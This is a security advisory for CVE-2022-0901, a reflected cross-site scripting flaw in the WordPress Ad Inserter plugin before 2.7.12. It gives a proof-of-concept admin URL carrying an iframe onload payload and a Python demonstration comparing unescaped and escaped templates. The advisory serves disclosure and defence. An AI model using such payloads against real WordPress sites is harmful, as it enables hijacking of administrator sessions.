0day.today ID: 1337DAY-ID-37598
Published: Apr 07, 2022

WordPress Ad Inserter Plugin < 2.7.12 - Cross Site Scripting Vulnerability

2022-04-07 00:00:00
Taurus Omar
0day.today
Tags: wordpress, cross site scripting, vulnerability, reflected, browser, xss, owasp a7, cwe-79, fixed, wpscan

EPSS: 0.001 (percentile 50.5%)

Title:
WordPress Plugin Ad Inserter < 2.7.12 - Reflected Cross-Site Scripting

References:
CVE-2022-0901

Author:
Taurus Omar

Description:
The plugins do not sanitise and escape the REQUEST_URI before outputting it back in an admin page, leading to Reflected Cross-Site Scripting in browsers that do not encode characters.

Affects Plugins:
ad-inserter
ad-inserter-pro
Fixed in version 2.7.12

Proof of Concept:
In a browser which does not encode characters:
https://example.com/wp-admin/options-general.php?page=ad-inserter.php&start=2&tab="><iframe/onload=alert(1)></iframe>
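The advisory's root cause is an attribute-context escaping failure: the request URI is written back into the admin page without escaping, and the proof of concept works only when the client sends the quote and angle brackets raw. The script below is an added example, not the advisory's text or the Ad Inserter plugin's code. The template functions `render_vulnerable` and `render_fixed` are hypothetical stand-ins for the affected admin page; `browser_encoded` approximates what a browser puts on the wire; `html.escape(quote=True)` plays the role that `esc_attr()` would in a WordPress fix. The input path is constructed from the proof of concept above.

```python
import html
from html.parser import HTMLParser
from urllib.parse import quote

# Constructed request path based on the advisory's proof of concept.
# The payload closes the quoted attribute and injects a new element.
POC_PATH = (
    "/wp-admin/options-general.php?page=ad-inserter.php&start=2"
    '&tab="><iframe/onload=alert(1)></iframe>'
)


def render_vulnerable(request_uri: str) -> str:
    """Hypothetical admin-page template: REQUEST_URI is echoed into an
    attribute with no escaping, the defect the advisory describes."""
    return f'<form method="post" action="{request_uri}">'


def render_fixed(request_uri: str) -> str:
    """Same template with attribute-context escaping. html.escape(quote=True)
    encodes & < > " and ', analogous to esc_attr() in WordPress."""
    return f'<form method="post" action="{html.escape(request_uri, quote=True)}">'


def browser_encoded(request_uri: str) -> str:
    """Approximates what a modern browser sends: quotes and angle brackets in
    the query string are percent-encoded, so server-side REQUEST_URI never
    carries them raw. That is why the advisory scopes the PoC to browsers
    which do not encode characters (or to requests crafted outside a browser)."""
    return quote(request_uri, safe="/?=&")


class _TagCollector(HTMLParser):
    """Records every start tag a browser would create from the markup."""

    def __init__(self) -> None:
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def rendered_tags(markup: str) -> list:
    """Parse the rendered markup and list the elements it produces."""
    collector = _TagCollector()
    collector.feed(markup)
    collector.close()
    return collector.tags


def injection_succeeded(markup: str) -> bool:
    """True if the payload broke out of the attribute and became an element."""
    return "iframe" in rendered_tags(markup)


if __name__ == "__main__":
    cases = [
        ("vulnerable template, raw request", render_vulnerable(POC_PATH)),
        ("vulnerable template, browser-encoded request",
         render_vulnerable(browser_encoded(POC_PATH))),
        ("fixed template, raw request", render_fixed(POC_PATH)),
    ]
    for label, markup in cases:
        print(f"{label}: injected={injection_succeeded(markup)}")
```

The three cases make the advisory's caveat concrete: the unescaped template only yields an injected element when the client sends the payload raw, while the escaped template is safe regardless of what the client encodes, which is why the fix belongs on the server rather than relying on browser behaviour.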

Classification:
Type: XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE-79

WPScan:
https://wpscan.com/vulnerability/85582b4f-a40a-4394-9834-0c88c5dc57ba
